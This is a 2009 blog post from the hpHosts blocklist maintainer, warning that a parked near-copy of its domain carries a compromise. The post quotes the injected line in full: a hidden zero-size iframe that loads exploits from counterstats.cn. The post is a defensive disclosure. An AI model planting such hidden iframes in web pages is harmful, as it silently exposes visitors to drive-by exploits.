Blog for hpHosts, and whatever else I feel like writing about ....

Saturday 7 November 2009

Warning: How a simple typo can hurt ....

99% of you will already be aware of the likes of typo squatters, so I'll refrain from blabbering on about those ones, and instead, use one I came across today, which isn't actually a typo squatter, is "parked", but still contains a nasty surprise.

The domain is hostsfile.net, look familiar? Yep, hpHosts is hosts-file.net (notice the difference?). If you made a typo whilst looking for the hpHosts website, you'd unfortunately set yourself up for an exploit, as lurking in the source code of hostsfile.net, is the following;

<iframe src="http://counterstats.cn/index.php" width="0" height="0" frameborder="0"></iframe>


Thankfully in this case, counterstats.cn seems to be down at present (OpenDNS, even after refreshing it's cache, is returning a "Did not resolve" error, not quite the NXDOMAIN I'd normally see, but good enough to prevent it's loading), but was serving some exploits the last time it was up. If you find this one via Google, you'll also notice it contains a warning not only for the infection site itself, but should also, as is the case with hostsfile.net, contain a warning for the site that's been compromised.

hostsfile.net IS actually registered, and the last time I checked it, was a legit site, but is currently parked with eccparking.com, so it's looking like the compromise is at the eccparking.com end (confirmed this by visiting the IP (IP is 67.228.216.52, which is on the SoftLayer range) itself). I'll be phoning them in a few mins to confirm and correct this.

Moral of the story? Be careful out there folks (yeah yeah, I can already hear the "but we are, really we are" ;o) ).

/update 03:57

Tried calling ECCParking, but got a "could not be routed" error. I have however, followed up with an e-mail to SoftLayer.

1 comment:

Zaphod said...

Yow! This is a case of needing to yank a domain, and appropriate it to the valid service, or at least cause a forwarding to it until such time the hostname points at a valid service of it's own.